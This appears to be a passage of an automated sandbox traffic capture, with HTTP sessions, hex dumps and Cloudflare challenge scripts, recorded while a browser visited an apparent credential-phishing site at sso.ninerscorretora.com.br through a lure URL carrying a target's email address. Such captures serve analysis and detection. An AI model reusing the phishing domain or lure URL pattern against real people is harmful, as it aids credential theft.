                                                        2025-03-25 20:29:34 UTC1369INData Raw: 28 64 5b 68 4e 28 31 30 39 33 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 68 4e 28 31 30 39 37 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 4e 28 35 37 38 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4e 3d 48 26 47 2c 48 3e 3e 3d 31 2c 64 5b 68 4e 28 35 37 31 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 30 3c 4e 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4f 3d 64 5b 68 4e 28 31 34 32 32 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 45 3d 73 5b 33 5d 3d 4f 2c 44 5b 68 4e 28 37 30 31 29 5d 28 4f 29 3b 3b 29 7b 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27
                                                        Data Ascii: (d[hN(1093)](0,N)?1:0)*F,F<<=1);O=d[hN(1097)](e,J);break;case 1:for(J=0,K=Math[hN(578)](2,16),F=1;K!=F;N=H&G,H>>=1,d[hN(571)](0,H)&&(H=j,G=o(I++)),J|=(0<N?1:0)*F,F<<=1);O=d[hN(1422)](e,J);break;case 2:return''}for(E=s[3]=O,D[hN(701)](O);;){if(I>i)return''
                                                        2025-03-25 20:29:34 UTC1369INData Raw: 2b 67 29 29 3b 69 5b 69 73 28 37 30 31 29 5d 28 53 74 72 69 6e 67 5b 69 73 28 36 33 36 29 5d 28 28 66 5b 69 73 28 31 30 30 35 29 5d 28 28 32 35 35 26 6b 29 2d 68 2c 67 25 36 35 35 33 35 29 2b 36 35 35 33 35 29 25 32 35 35 29 29 29 3b 72 65 74 75 72 6e 20 69 5b 69 73 28 38 31 35 29 5d 28 27 27 29 7d 2c 65 4d 5b 67 4a 28 39 35 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 69 75 2c 64 2c 65 2c 66 2c 67 29 7b 69 75 3d 67 4a 2c 64 3d 7b 7d 2c 64 5b 69 75 28 38 39 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 69 7d 2c 64 5b 69 75 28 37 35 37 29 5d 3d 69 75 28 31 31 35 32 29 2c 64 5b 69 75 28 31 35 31 31 29 5d 3d 69 75 28 36 38 31 29 2c 64 5b 69 75 28 31 31 37 36 29 5d 3d 69 75 28 31 34 33 33 29 2c 64 5b 69 75 28 37 37 35 29 5d
                                                        Data Ascii: +g));i[is(701)](String[is(636)]((f[is(1005)]((255&k)-h,g%65535)+65535)%255)));return i[is(815)]('')},eM[gJ(958)]=function(iu,d,e,f,g){iu=gJ,d={},d[iu(898)]=function(h,i){return h!==i},d[iu(757)]=iu(1152),d[iu(1511)]=iu(681),d[iu(1176)]=iu(1433),d[iu(775)]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.449752104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:34 UTC784OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:34 UTC240INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:34 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        cache-control: max-age=2629800, public
                                                        Server: cloudflare
                                                        CF-RAY: 92612941891b862e-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.449754104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:34 UTC425OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:34 UTC240INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:34 GMT
                                                        Content-Type: image/png
                                                        Content-Length: 61
                                                        Connection: close
                                                        cache-control: max-age=2629800, public
                                                        Server: cloudflare
                                                        CF-RAY: 926129454dc0577b-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.449755103.114.43.73443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:34 UTC851OUTGET /favicon.ico HTTP/1.1
                                                        Host: sso.ninerscorretora.com.br
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://sso.ninerscorretora.com.br/?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
                                                        2025-03-25 20:29:35 UTC122INHTTP/1.1 500 Internal Server Error
                                                        Date: Tue, 25 Mar 2025 20:29:35 GMT
                                                        Connection: close
                                                        Transfer-Encoding: chunked
                                                        2025-03-25 20:29:35 UTC33INData Raw: 31 36 0d 0a 3c 68 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 68 31 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 16<h1>Access Denied</h1>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.449756104.18.95.41443352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 20:29:34 UTC1190OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/388899321:1742930844:sP1vMOt9cepvez2L-LaawesgzBBgiC7IfsMEBenDenU/9261293dee55c468/5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI HTTP/1.1
                                                        Host: challenges.cloudflare.com
                                                        Connection: keep-alive
                                                        Content-Length: 3620
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        Content-Type: text/plain;charset=UTF-8
                                                        cf-chl: 5xuf3vS44zr.1MtVIn264UzO918ABLgF77tkOMIwSa0-1742934573-1.1.1.1-w0fL8wWVhFYbbNLb8vZRz7iPGM172z09xbC1Lro8sJ7vcbuRFZImQ92sY9REweOI
                                                        cf-chl-ra: 0
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: https://challenges.cloudflare.com
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/enwsv/0x4AAAAAABBaK7aSfnN9RzmT/auto/fbE/new/normal/auto/
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 20:29:34 UTC3620OUTData Raw: 49 6d 6c 70 45 70 46 70 48 70 6c 70 32 66 61 78 66 61 4e 70 66 44 4c 57 55 63 66 43 61 55 61 50 6a 44 75 2b 37 61 38 69 57 70 2d 37 4c 69 61 47 61 30 37 55 57 79 37 36 46 53 79 61 43 37 75 79 61 68 61 49 24 70 61 45 69 70 61 42 75 61 42 4f 6d 36 59 61 48 6c 56 69 69 79 75 37 4c 6e 61 4b 44 4c 50 61 48 77 4b 4e 56 61 59 70 61 53 61 6f 7a 68 46 32 53 61 6c 4e 43 30 67 61 43 6d 36 6f 43 48 56 43 6c 33 36 70 43 4e 77 4a 6b 6b 34 30 49 56 42 58 2b 37 61 69 35 35 32 79 44 7a 48 66 2b 30 61 55 42 4f 4b 4e 44 72 49 4e 61 45 48 5a 63 6f 49 7a 31 31 48 70 6d 30 4c 61 36 4e 42 36 4b 72 4f 69 63 6c 61 4c 2b 46 61 4c 79 64 61 66 69 36 6c 44 61 6b 61 43 35 61 37 6f 77 6f 61 7a 72 46 61 69 74 77 43 72 70 61 48 50 57 38 58 6f 79 63 43 69 34 6c 48 77 38 61 42 63 67 64 6e
                                                        Data Ascii: ImlpEpFpHplp2faxfaNpfDLWUcfCaUaPjDu+7a8iWp-7LiaGa07UWy76FSyaC7uyahaI$paEipaBuaBOm6YaHlViiyu7LnaKDLPaHwKNVaYpaSaozhF2SalNC0gaCm6oCHVCl36pCNwJkk40IVBX+7ai552yDzHf+0aUBOKNDrINaEHZcoIz11Hpm0La6NB6KrOiclaL+FaLydafi6lDakaC5a7owoazrFaitwCrpaHPW8XoycCi4lHw8aBcgdn
                                                        2025-03-25 20:29:35 UTC1115INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 20:29:35 GMT
                                                        Content-Type: text/plain; charset=UTF-8
                                                        Content-Length: 242024
                                                        Connection: close
                                                        cf-chl-gen: UI3ab11IInXO6UDiwk+2Xdvf1+AwW0vMbxHwyMHJP8TGBFqLOS2JNh3uhPOTMYOu10hE4yPrclUZi1Yz4fu63OeC0HBYyf6IXr9HYN63vuAEB9PBBd//yn3RckH2iO0qORh90eYU1uIjzB3YFTc6qFCfj8fmBQY7YkgfxBtWJy3QCfOjd9rH9esBHmWCEAoP+qHWzmI6gAOR9CNYK03iY0cz1/O0WOO9gQfNyTI4EB9yf6Beq2yh0V03ki/ZG86QNqAIQ7Lypf1SoGZFZ0oIJhpo2r4BXLsac2qELyvGXVEix6u7DjR9F3Md1H5FiXVE9DV96fVfIcTgwsbHfDcKVhveJHJMgfo+3QH9rWYhaXUVpAP1NXrRPq4u+xPwukXI2ALVrS7+NMr9d8omiqn+UkY5kbxE/EdRWJAPL+o0loJL5quQZB05KTJCKL8UqYWAAzVvgfnDm4DahN3A3a6RJISB6ZbsSHTh7b6L4K7UA1hW+6tk+be7zgByElSs0mrFd3lG1SdNMyQtWom1cRzks4sYaWOgey/xnUxUaaMn9NUzb5UexNarXU2KD+KRwV4XZQtm9b6rE06LhznHlID8+05EFWoLXcEP4c7FOnttGfEMy5i6+HJckp3vjL2RvCmJ08Rl14YxXEkR/XKTltrD16udTZ1hJSgpRhGVe3N3j3L+aUSQKyPqkptEXPcZk6MY9rk2L+jSlg2QKl8r3DwbdXLB+NIip3GqpQmnqjKqnOKSW86WNcebDs0p3VA/gIHdFcUcBQsc1Gz6UYURVRUedz1GLqxsbAdSlMU4Lze9oGZ5xlUFb6UKlnX+mcXU10IC9mNH5ePoY8KRBuhggk69vg==$8ODEj1QtDZtr5y6ml0mAIA==
                                                        Server: cloudflare
                                                        CF-RAY: 92612945cc3a58af-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        2025-03-25 20:29:35 UTC254INData Raw: 75 33 75 55 66 71 75 37 75 61 4b 36 76 70 57 34 70 4a 65 31 78 36 79 72 6b 4a 47 72 78 59 32 7a 6b 5a 54 4b 7a 62 75 74 71 39 58 5a 77 4d 6e 4c 75 2b 54 6d 6d 4d 2f 6c 30 39 36 38 36 37 32 37 75 71 2b 6a 34 38 37 30 77 2b 66 52 78 76 6a 4f 35 39 7a 79 75 66 53 2f 76 64 72 38 2f 63 2f 35 41 41 48 6e 41 77 66 4a 79 76 66 59 7a 4d 76 6e 38 41 73 47 41 52 49 42 39 65 62 6e 36 76 41 4f 39 42 44 31 38 50 44 68 49 76 72 6b 42 78 49 49 48 43 51 57 2b 69 45 43 44 41 59 6a 45 50 34 76 41 53 38 61 2b 69 67 63 46 76 34 73 48 2f 30 37 47 79 50 39 4f 79 67 37 4a 53 45 61 50 45 6c 41 52 54 74 53 52 53 30 68 56 46 56 48 51 54 63 4e 56 45 70 5a 59 42 39 50 55 78 6b 73 4c 55 49 78 48 6d 70 58 4b 52 35 63 53 46 63 69 62 47 74 30 5a 32 4e 4b 61 45 42 72 59 30 77 36 5a 6b
                                                        Data Ascii: u3uUfqu7uaK6vpW4pJe1x6yrkJGrxY2zkZTKzbutq9XZwMnLu+TmmM/l09686727uq+j4870w+fRxvjO59zyufS/vdr8/c/5AAHnAwfJyvfYzMvn8AsGARIB9ebn6vAO9BD18PDhIvrkBxIIHCQW+iECDAYjEP4vAS8a+igcFv4sH/07GyP9Oyg7JSEaPElARTtSRS0hVFVHQTcNVEpZYB9PUxksLUIxHmpXKR5cSFcibGt0Z2NKaEBrY0w6Zk
                                                        2025-03-25 20:29:35 UTC1369INData Raw: 64 59 61 7a 68 57 55 6d 39 6c 64 6c 64 6e 64 58 4a 48 64 6c 6c 70 69 48 71 4a 68 6d 71 53 61 6d 4e 55 6c 32 4e 6f 62 6d 6c 31 64 6f 2b 55 58 6c 78 36 67 56 79 56 6b 32 61 53 61 71 6d 6d 6f 5a 70 75 6b 4a 36 71 65 35 32 53 74 62 53 67 63 58 61 34 6c 33 65 66 76 4b 74 36 67 6e 36 6a 77 4a 79 39 66 36 61 6b 77 63 43 4b 67 4c 33 48 6f 74 43 73 72 62 58 55 71 71 4c 47 79 73 75 63 76 4e 79 74 6d 70 66 42 34 5a 2b 38 76 38 54 48 70 4c 6a 4d 72 4e 72 4e 7a 4b 2b 78 32 76 4c 30 77 4b 2f 31 38 2b 4c 49 2f 50 62 50 31 74 6a 55 77 65 44 44 2b 76 44 37 77 38 43 2f 33 66 33 39 31 76 63 4a 7a 2b 6a 78 43 73 2f 7a 30 41 6e 68 38 4f 50 35 38 4f 6b 51 37 76 4c 72 48 52 6e 34 41 50 34 6e 2b 69 6f 6a 42 53 4d 42 4b 65 34 70 4b 75 73 65 4d 51 6b 6a 4a 43 37 32 39 53 73 61 4d
                                                        Data Ascii: dYazhWUm9ldldndXJHdllpiHqJhmqSamNUl2Nobml1do+UXlx6gVyVk2aSaqmmoZpukJ6qe52StbSgcXa4l3efvKt6gn6jwJy9f6akwcCKgL3HotCsrbXUqqLGysucvNytmpfB4Z+8v8THpLjMrNrNzK+x2vL0wK/18+LI/PbP1tjUweDD+vD7w8C/3f391vcJz+jxCs/z0Anh8OP58OkQ7vLrHRn4AP4n+iojBSMBKe4pKuseMQkjJC729SsaM
                                                        2025-03-25 20:29:35 UTC1369INData Raw: 61 67 34 55 36 59 48 4e 34 53 31 68 49 59 31 78 78 62 46 39 71 55 49 47 46 62 34 4e 6d 6b 47 52 55 55 46 61 54 66 70 61 63 6c 46 75 51 68 58 75 43 65 61 70 6a 72 6d 43 65 6e 34 75 6e 66 32 31 75 6f 6f 4b 74 6c 34 64 34 73 72 31 30 6c 49 43 75 74 49 75 57 68 62 43 30 6c 71 71 30 76 4c 2b 4a 6f 37 6d 72 78 4b 6a 4a 73 38 61 32 73 63 36 6a 75 70 57 77 78 73 37 54 33 61 32 37 76 74 65 39 7a 36 54 43 76 72 33 43 33 4d 62 47 35 64 36 6f 77 4d 37 4a 72 62 53 33 36 4d 66 78 31 2b 66 4d 32 39 66 31 7a 4d 4c 59 42 4c 66 2b 33 2b 48 54 38 76 54 6d 32 75 50 75 36 75 33 4b 35 78 54 52 43 74 41 4e 34 39 4c 58 45 2b 62 64 31 79 44 79 33 79 41 45 34 77 4d 4a 38 67 67 43 47 41 45 49 2f 67 44 35 35 7a 44 2b 42 78 58 31 45 67 67 37 4d 79 62 30 43 78 33 37 4f 7a 59 52 4c 6a
                                                        Data Ascii: ag4U6YHN4S1hIY1xxbF9qUIGFb4NmkGRUUFaTfpaclFuQhXuCeapjrmCen4unf21uooKtl4d4sr10lICutIuWhbC0lqq0vL+Jo7mrxKjJs8a2sc6jupWwxs7T3a27vte9z6TCvr3C3MbG5d6owM7JrbS36Mfx1+fM29f1zMLYBLf+3+HT8vTm2uPu6u3K5xTRCtAN49LXE+bd1yDy3yAE4wMJ8ggCGAEI/gD55zD+BxX1Egg7Myb0Cx37OzYRLj
                                                        2025-03-25 20:29:35 UTC1369INData Raw: 68 6b 71 4b 53 6f 71 4a 68 6d 4f 43 55 57 4a 72 67 49 65 53 65 33 5a 72 6e 58 43 42 6d 6e 47 63 64 33 6d 63 6f 35 79 54 59 58 36 63 6a 6e 75 65 71 4a 35 6b 69 4b 71 49 72 4b 47 56 6a 6f 61 38 62 71 79 2f 66 70 61 59 6e 48 76 44 6e 38 65 58 6b 72 79 42 77 70 32 37 79 36 44 4f 6a 70 33 44 78 39 62 4d 77 74 43 6b 30 64 79 35 76 4c 75 6f 7a 63 72 6a 6e 62 4c 53 74 37 4b 6f 70 4c 6d 68 70 74 6e 76 33 4c 44 49 34 2f 53 7a 79 72 44 78 30 4e 72 35 35 62 7a 36 37 65 66 66 76 74 63 44 42 74 33 78 42 63 63 49 34 74 69 2b 2f 4e 72 6f 32 64 72 67 43 41 41 58 47 42 67 4e 37 41 2f 6b 46 39 67 4d 48 77 73 43 32 2b 30 63 42 76 6a 35 46 76 6e 63 47 42 76 39 36 75 34 46 48 69 6b 76 4c 43 34 6c 41 6a 58 31 4f 53 6b 35 2f 44 76 38 2b 43 74 45 44 42 41 62 46 51 56 46 52 54 63
                                                        Data Ascii: hkqKSoqJhmOCUWJrgIeSe3ZrnXCBmnGcd3mco5yTYX6cjnueqJ5kiKqIrKGVjoa8bqy/fpaYnHvDn8eXkryBwp27y6DOjp3Dx9bMwtCk0dy5vLuozcrjnbLSt7KopLmhptnv3LDI4/SzyrDx0Nr55bz67effvtcDBt3xBccI4ti+/Nro2drgCAAXGBgN7A/kF9gMHwsC2+0cBvj5FvncGBv96u4FHikvLC4lAjX1OSk5/Dv8+CtEDBAbFQVFRTc
                                                        2025-03-25 20:29:35 UTC1369INData Raw: 6e 35 2b 5a 48 42 4a 55 34 47 53 69 31 4a 64 66 58 4f 4a 63 56 79 54 6d 6e 56 77 59 6f 64 69 6b 34 74 72 6d 36 4a 37 6d 57 78 2b 6d 36 69 53 72 58 43 73 69 48 61 4e 6d 70 4a 31 6e 5a 6d 74 67 5a 36 59 67 5a 43 42 68 6e 76 4a 6c 4c 36 49 78 36 61 68 70 62 44 51 73 4c 47 32 79 70 50 54 71 63 7a 62 30 36 76 4c 79 2b 44 55 6c 64 71 79 78 62 48 67 74 64 62 6b 75 64 62 48 75 4d 36 38 32 37 4f 74 71 2f 62 32 30 4d 4c 32 35 64 6e 63 33 2f 6e 66 7a 37 72 37 33 4f 49 49 30 4e 37 69 2b 50 58 59 2b 38 34 4b 30 41 49 4d 30 4e 38 47 47 4f 7a 6b 34 67 54 30 47 68 50 37 39 74 62 36 41 52 30 4e 38 75 4c 68 2f 67 55 4c 42 4f 6f 71 46 77 48 37 35 2f 6f 41 4c 2f 51 70 45 43 66 30 43 7a 49 54 42 78 49 34 38 67 73 62 50 42 73 62 48 6b 44 36 45 78 74 45 49 79 49 65 53 41 4d 61
                                                        Data Ascii: n5+ZHBJU4GSi1JdfXOJcVyTmnVwYodik4trm6J7mWx+m6iSrXCsiHaNmpJ1nZmtgZ6YgZCBhnvJlL6Ix6ahpbDQsLG2ypPTqczb06vLy+DUldqyxbHgtdbkudbHuM6827Otq/b20ML25dnc3/nfz7r73OII0N7i+PXY+84K0AIM0N8GGOzk4gT0GhP79tb6AR0N8uLh/gULBOoqFwH75/oAL/QpECf0CzITBxI48gsbPBsbHkD6ExtEIyIeSAMa
                                                        2025-03-25 20:29:35 UTC1369INData Raw: 57 54 6a 32 70 70 65 70 35 35 58 36 42 66 64 35 56 64 71 4a 64 70 64 6e 79 63 66 5a 6c 6f 67 59 4f 65 69 58 35 74 72 59 78 76 67 6f 4f 76 64 71 79 4f 6c 6f 6d 54 71 35 74 36 76 4a 43 58 73 37 6e 41 6b 38 6d 61 77 49 37 48 7a 49 53 69 6b 4c 4c 57 71 38 79 7a 32 4c 4c 45 32 73 69 37 71 37 75 68 73 4a 71 74 73 4c 2f 65 34 4c 6a 71 33 4d 7a 4f 70 65 7a 67 36 63 2b 72 79 38 72 76 7a 50 6a 73 35 4d 7a 74 35 74 73 43 37 2b 72 61 38 2f 72 30 2b 74 41 48 32 51 50 37 41 67 76 65 2b 41 7a 66 37 4f 62 53 7a 75 48 79 39 51 33 4e 39 2f 76 7a 48 51 49 57 45 42 51 62 44 79 62 78 45 76 4c 6f 4a 69 7a 66 48 41 63 48 2b 51 44 79 4d 41 6b 75 42 69 49 69 46 53 63 71 2b 78 30 36 4f 78 6b 37 45 43 41 61 4a 68 77 58 50 67 73 73 51 51 77 6d 4c 41 67 73 4d 69 77 7a 46 44 59 35 51
                                                        Data Ascii: WTj2ppep55X6Bfd5VdqJdpdnycfZlogYOeiX5trYxvgoOvdqyOlomTq5t6vJCXs7nAk8mawI7HzISikLLWq8yz2LLE2si7q7uhsJqtsL/e4Ljq3MzOpezg6c+ry8rvzPjs5Mzt5tsC7+ra8/r0+tAH2QP7Agve+Azf7ObSzuHy9Q3N9/vzHQIWEBQbDybxEvLoJizfHAcH+QDyMAkuBiIiFScq+x06Oxk7ECAaJhwXPgssQQwmLAgsMiwzFDY5Q
                                                        2025-03-25 20:29:35 UTC1369INData Raw: 57 6b 35 36 59 66 6e 47 42 6d 6c 70 6c 58 4a 65 56 65 59 2b 6c 69 32 32 76 6b 49 39 7a 69 4b 4b 77 69 36 70 33 6b 5a 4f 61 6c 6e 76 43 76 4a 2b 77 73 72 53 50 65 73 69 71 6c 35 6e 4d 71 6f 6d 64 71 49 6d 66 79 71 6d 67 6b 4b 4f 50 32 36 53 61 6e 4b 6d 6e 6d 4b 6e 4c 6f 75 4f 37 73 4b 57 68 76 36 44 45 36 38 43 6e 72 71 66 75 37 37 2f 7a 73 2f 4b 74 39 50 4f 35 30 38 58 70 38 37 71 37 2f 4f 76 30 7a 65 38 43 39 4e 45 47 43 50 77 45 39 65 4d 49 7a 66 30 4d 30 65 45 49 30 64 51 45 38 42 41 58 43 39 50 64 31 74 6b 4d 44 50 49 6a 49 4e 7a 78 41 64 38 6b 43 41 4d 68 42 53 50 69 42 44 49 45 45 51 44 31 36 54 50 77 42 6a 59 5a 43 44 63 35 47 51 34 59 47 43 41 69 41 7a 4d 68 50 43 41 61 4a 45 68 4d 48 79 4e 4d 55 6b 49 69 4a 55 41 53 49 6c 6b 37 4f 69 55 55 58 53
                                                        Data Ascii: Wk56YfnGBmlplXJeVeY+li22vkI9ziKKwi6p3kZOalnvCvJ+wsrSPesiql5nMqomdqImfyqmgkKOP26SanKmnmKnLouO7sKWhv6DE68Cnrqfu77/zs/Kt9PO508Xp87q7/Ov0ze8C9NEGCPwE9eMIzf0M0eEI0dQE8BAXC9Pd1tkMDPIjINzxAd8kCAMhBSPiBDIEEQD16TPwBjYZCDc5GQ4YGCAiAzMhPCAaJEhMHyNMUkIiJUASIlk7OiUUXS
                                                        2025-03-25 20:29:35 UTC1369INData Raw: 67 70 43 68 67 71 4e 38 62 59 78 2f 5a 6f 69 6a 6f 61 46 79 63 6f 4b 79 6b 4c 69 6f 6b 72 65 72 74 34 6a 42 6a 70 36 54 74 48 69 69 68 63 43 57 6f 6f 62 4a 72 62 32 4f 7a 5a 43 65 6a 36 75 78 77 63 4b 68 7a 39 61 6d 79 35 71 79 32 37 72 55 77 37 62 54 31 4e 75 30 77 37 62 4b 33 75 50 42 36 64 79 38 37 73 33 6b 73 38 54 43 35 4f 36 31 39 62 54 37 7a 4e 37 74 39 73 72 75 30 2f 44 37 30 50 30 43 33 2b 45 45 35 67 48 64 38 4e 48 51 37 74 2f 64 35 68 58 73 34 52 73 55 37 64 54 35 36 66 51 6a 36 74 76 30 4a 76 72 39 2f 51 58 32 35 79 51 62 49 4f 37 70 38 66 45 65 4d 79 6f 59 4c 53 50 77 43 43 6b 62 44 6a 41 38 4c 42 4d 52 45 6a 45 41 51 78 6f 55 41 42 73 55 44 52 70 4e 54 53 74 4d 54 55 55 6e 49 41 35 46 4c 43 51 57 4d 44 42 65 50 30 31 50 49 46 41 74 51 55 55
                                                        Data Ascii: gpChgqN8bYx/ZoijoaFycoKykLiokrert4jBjp6TtHiihcCWoobJrb2OzZCej6uxwcKhz9amy5qy27rUw7bT1Nu0w7bK3uPB6dy87s3ks8TC5O619bT7zN7t9sru0/D70P0C3+EE5gHd8NHQ7t/d5hXs4RsU7dT56fQj6tv0Jvr9/QX25yQbIO7p8fEeMyoYLSPwCCkbDjA8LBMREjEAQxoUABsUDRpNTStMTUUnIA5FLCQWMDBeP01PIFAtQUU
                                                        2025-03-25 20:29:35 UTC1369INData Raw: 4b 6d 77 63 4b 4f 50 72 58 4f 4e 67 36 42 30 65 4c 69 49 63 6f 5a 35 6d 34 75 61 6b 4b 7a 46 77 38 4b 52 75 49 4f 38 79 61 79 4a 6d 4a 2b 4d 6b 63 69 78 6c 49 79 78 6f 70 62 4e 31 36 66 55 74 70 57 39 6e 72 66 42 72 65 58 68 6f 4e 66 51 31 4b 48 57 36 4c 2b 37 75 36 4c 75 30 62 44 41 36 74 4c 47 74 73 4c 49 74 66 61 33 35 2b 36 79 79 62 6e 56 34 63 37 31 43 4d 66 53 38 38 6e 5a 43 38 6e 65 41 78 4c 68 37 65 6e 6c 42 66 66 33 46 76 49 49 37 68 7a 6d 43 42 34 58 31 42 54 38 34 67 45 6a 2f 53 58 7a 4a 68 59 4b 48 69 67 4c 48 68 4c 2b 45 78 51 50 4e 4f 37 76 44 77 63 76 4a 2f 58 36 2b 44 59 54 4d 68 4d 58 49 30 6a 36 42 41 6c 45 50 78 63 6e 50 52 46 4f 43 53 6b 52 46 68 56 41 4e 53 68 44 54 43 39 65 4d 69 68 52 51 55 51 6b 57 46 4d 36 55 54 59 67 54 44 6b 2b
                                                        Data Ascii: KmwcKOPrXONg6B0eLiIcoZ5m4uakKzFw8KRuIO8yayJmJ+MkcixlIyxopbN16fUtpW9nrfBreXhoNfQ1KHW6L+7u6Lu0bDA6tLGtsLItfa35+6yybnV4c71CMfS88nZC8neAxLh7enlBff3FvII7hzmCB4X1BT84gEj/SXzJhYKHigLHhL+ExQPNO7vDwcvJ/X6+DYTMhMXI0j6BAlEPxcnPRFOCSkRFhVANShDTC9eMihRQUQkWFM6UTYgTDk+


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
